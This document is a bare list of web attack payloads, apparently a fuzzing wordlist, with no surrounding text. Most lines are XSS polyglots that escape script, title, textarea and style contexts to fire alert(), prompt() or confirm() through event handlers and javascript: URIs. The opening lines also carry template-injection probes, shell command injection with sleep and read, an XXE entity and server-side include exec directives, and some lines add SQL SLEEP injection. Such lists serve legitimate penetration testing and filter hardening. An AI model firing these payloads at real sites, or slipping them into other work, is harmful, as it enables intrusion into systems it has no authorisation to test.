jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'${{7*7}}${7*7}%25{7*7}`read`$(read)`sleep 60`$(sleep 60)<?php die;?>&xxe;<script type="text/php">die;</script><!--#exec cmd="/bin/ps ax"--><!--#include virtual="/proc/version"-->👻
jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'${{7*7}}${7*7}%25{7*7}`read`$(read)`sleep 60`$(sleep 60)<?php die;?>&xxe;<script type=\"text/php\">die;</script><!--#exec cmd=\"/bin/ps ax\"--><!--#include virtual=\"/proc/version\"-->👻
%09 javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0D %0A onclick=alert()//>a
%09 javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
%09 javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
%09 " onfocus=alert(1); " %0D %0A " onfocus=alert(1); " <a href="javascript://'/</title></style></textarea></script>--><p onclick=alert(1)>XXX #
%09 //'/<@/></script></div></script>--><select */onclick=alert()><o>1<o>2')//"<!--
%09 /</title/'/</style/</script/--><p" %0D %0A onclick=alert()//>*/alert()/*
*/-->%0A'"<p onclick=alert()>
%0D %0A %0D %0A jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
"'; %0D %0A alert(); %0D %0A onclick=alert(); %0D %0A onerror=alert();
0x0://'/</title></style></textarea></script>--><p"/onclick %0D %0A =alert()//>*/alert()/*
<a id='' onclick=alert()> %0D %0A <script>alert()</script> %0D %0A <input onfocus=alert() autofocus>
alert(1)//"' ;alert(1)//onclick=alert(1) '" onclick=alert(1)
';alert()//';alert()//";alert()//";alert(String.fromCharCode()//--></SCRIPT>">'><SCRIPT>alert()</SCRIPT>
'|alert()|'+"|alert()|";alert()//</noscript></script></title></textarea>%0a<svg/onclick=alert()>
alert()//<div onclick=alert()><img src=1 onerror=alert()><script>alert()</script>alert()
"|alert()|" ' onclick=alert();//'</title></script></iframe></textarea><body onclick="alert()">
alert();-->*/"/'</script>/alert()/onclick=alert()'"</title></textarea></style><p onclick=alert()>a'
';alert();'"</script><p onclick=alert()> onclick=alert() />--><script>alert()</script>*/alert()/*
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
*/alert()/*\*'\"--></style></script><script>alert()</script><img src=x onclick=alert()><div onclick=alert()>
alert();//'"--></title></style></textarea></script><a%0d%0A onclick=alert()//>x
"a"; */ onclick=alert(); /*
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
<button '" onclick=alert(1)//>*/alert()/*
<button ' onclick=alert(1)//>*/alert(1)//
<!--/*--><![CDATA[/*>"'</textarea></div></title></script><a onclick=alert()>x<!--*/
eval('alert()')//<div onclick=alert()><img src=1 onerror=alert()><script>alert()</script><a href=javascript:alert()>a</a>
<input onclick=alert() onfocus=onclick() onload=onclick() onblur=onclick()><object onclick=alert()>javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">[img=1]<img -/style=-=expression(/*’/-/*',/**/eval(name)//);width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>"
<input type="button" value="click" onClick="alert('xss')">
javascript://'//" %0A --></textarea></style></script></title><b onclick= %0A alert()//>*/alert()/*
javascript:alert()//"//' %0D %0A onclick=alert()//--></style></script><script>alert()</script>*/alert()/*
javascript:alert(1);"; onclick=alert(1);// '; onclick=alert(1);//--></style></script><button onclick=alert(1);> %0D %0A
javascript:alert(1)//'//"//</script><script>alert(1)</script>--><div %0D %0A onclick=alert(1)//*/alert(1)/*>
javascript:alert(1)//}</style></title></textarea></script>--><button '" onclick=alert(1)//>*/alert()/*
javascript:alert()//';alert();'";alert()//</script> onclick=alert() --></title><script>alert()</script>*/alert() /*
javascript:alert()//*/alert()/*</style></title></script>--><body onload=alert()>'"; onclick=alert() %0D %0A alert()
javascript:alert()//*/alert()/*</style></title></script>--><body onload=alert()>'"; onclick=alert() alert() %0D %0A %0D %0A
javascript:alert()//--></script></textarea></style></title><a"//' %0D %0A onclick=alert()//>*/alert()/*
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* %0D %0A
javascript:alert();//</script></textarea></title></style>%0d%0a<x onclick=alert()//>x
javascript:alert()//<svg/onload=alert()>'-alert("-alert()-")-'
javascript:alert()//</title></style></script>-->";alert()//*/alert()/*<a ';alert()//\' onclick=alert()//> %0D %0A alert()//
javascript:alert();//'"</title></style></textarea></script/--><a/%0d%0a onclick=alert()//>x
javascript:alert()/*"'</title></style></textarea></script/-->*/<a%0d%0a onclick=alert()//>x
javascript:alert()//</title></textarea></style></script --><svg '//" %0D %0A onclick=alert()//>
javascript://'/</div></title></textarea></div></script>--><p" onclick=alert()//>*/alert()/*
javascript://'</div></title></textarea></style></script>--><x" onclick=alert()//>*/alert()/*
/´`'*--\\'">javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">[img=1]<img -/style=-=expression(/*’/-/*',/**/eval(name)//);width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>"
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e %0D %0A
jaVasCript:/*-/*`/*\`/*'/*"/**/( oNmouseover=alert() )//%0D%0a%0d%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
javascript:/*--></script>">[img=1]<img -/style=-=expression(/*’/-/*',/**/alert()//);-o-link:javascript:eval(title);-o-link-source:current onclick=alert() background=javascript:alert()>"<svg onclick=alert()>
javascript://--></script></textarea></title></style><hr onclick= %0D %0A onclick=alert()
javascript://--></script></title></style>/"</textarea>/'/*/<alert()/*' %0A onclick=alert()//>a
javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0A onclick=alert()//>a
javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0A onclick=alert()//>a %0D %0A
javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0D %0A onclick=alert()//>
javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0D %0A onclick=alert()//>a
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>d
javascript://'/</style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
jaVasCript://</stYle/'/</titLe/</teXtarEa/</scRipt/-->*/<alert()/*" %0A oNcliCk=alert()//>x
javascript:/*--></textarea></style></button></script></meta><select/onclick='+/"/+/[*/[]/+alert()//'>
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' %0D %0A onclick=alert()//>/
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://*'"/</title></style></textarea></script>--><a%0A onclick=alert()//%0A>x
javascript://</title></style></textarea>--></script><a"//' %0D %0A onclick=alert()//>*/alert()/*
javascript://'"</title></style></textarea></script/--><a/%0d%0a onclick=alert()//>x
javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p"%0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea>>/script>--><p" %0A onclick=alert()//>*/alert()/*
javascript://'/>/title></style></textarea></script>--><p "%0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/* %0D %0A
javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/* zzzzz
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript:/*'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* %0D %0A
javascript://'/</title></style></textarea</script--><q" %0a onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><select %0D %0A */onclick=alert()><o>1<o>'//"<!--
javascript://'/</title></style></textarea></script>--><svg onclick=alert()
javascript://'/</title></style></textarea></script>--><svg onclick=alert()//>*/alert()/*
javascript:/*--></title></style></textarea></script><svg/onload=click() onclick='+/" /+/ onmouseover=1/+/[*/[]/+alert()//'>
javascript://'/</title></style></textarea><svg" onclick=alert()//></script>-->*/alert()/*
javascript://</title></textarea></style></script --><li '//" %0A '*/alert()/*', onclick=alert()//
" onclick=alert(1)//<button ' onclick=alert()//>
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
" onclick=alert(1)//<button ' onclick=alert(1)//>*/alert(1)//
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
onclick=alert()//<b onclick=alert()//>*/alert()//'"--></style><SCRIPT>alert()</SCRIPT><div>onclick=alert()//<b' onclick=alert()//>*/alert()
" onclick=alert() //<button ' onclick=alert()//>
" onclick=alert()//<button ' onclick=alert()//> */ alert()//<img style="background-url=eval(onclick)" onclick=alert()>//>
' onclick=alert();//'"></noscript></title></script></iframe></textarea><body onclick="alert()">
"onclick=alert()//<svg/onclick=alert()//'onclick=alert()//<id onclick=alert()//";onclick=alert()//</style onclick=alert()//</script><svg '//" onclick=alert(1)//
' onclick=alert();//'"></title></script></iframe></textarea><body onclick="alert()">
'"onerror=alert(1);>javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
" onfocus=alert(1); " %0D %0A " onfocus=alert(1); " <a href="javascript://'/</title></style></textarea></script>--><p onclick=alert(1)>XXX %0D %0A %0D %0A # %0D %0A
onmouseover=alert() " onmouseover=alert() */ onmouseover=alert() */ '<div onclick=alert()>'
<p" %0A onclick=alert()//>
<q/oncut=alert()</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/*
</script>-->alert()"';alert();'<script>alert()</script> onclick=alert() */alert()/*
<script>alert()</script>//<svg/onload=alert()>//<a class="" onclick=alert(1)//<button value=test 'onclick=alert()//>*/alert();/*
//'/<@/></script></div></script>--><select\ %0D %0A */onclick=alert()><o>1<o>2')//"<!--
//'/<@/></script></div></script>--><select */onclick=alert()><o>1<o>2')//"<!--
<script>/* \n{{ %09 javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*}} \n*/</script>
<script>onclick=alert()</script><div onclick=alert()>
</script><svg onload='-/"/-alert(1)//'
--></script></title></style>"/</textarea><a' %0A onclick=alert()//>*/alert()/*
/*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or' /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/'or" /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/"  /*
/*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or' /*! SLEEP(1) or /*/, onclick=alert(1)//> /*/*/'or" /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/"/**/ /*!/*/ // /*/*/
"+'<svg/onclick=alert().source;;throw'atom';//>
<svg onload=" %0D %0A %0D %0A void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'; %0D %0A %0D %0A "></svg>
<!--<textarea alt='jaVasCript:/*-/*`/*\`/*'/*"/**/(/*' */oNcliCk=alert(6) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(2)//>\x3e>xxx</textarea>;'#"><!-- <textarea alt='jaVasCript:/*-/*`/*\`/*'/*"/**/(/*' */oNcliCk=alert(6) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(2)//>\x3e>xxx</textarea-->
/</title/'/</style/</script/--><p" %0A onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" %0A onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* %0D %0A
//'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
//'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
var ()=\`\`;javascript://</title></style></textarea>--></script><a"//' %0D %0A onclick=alert()//>*/alert()/*
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ' onclick=alert();//'"></title></script></iframe></textarea><body onclick="alert()">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
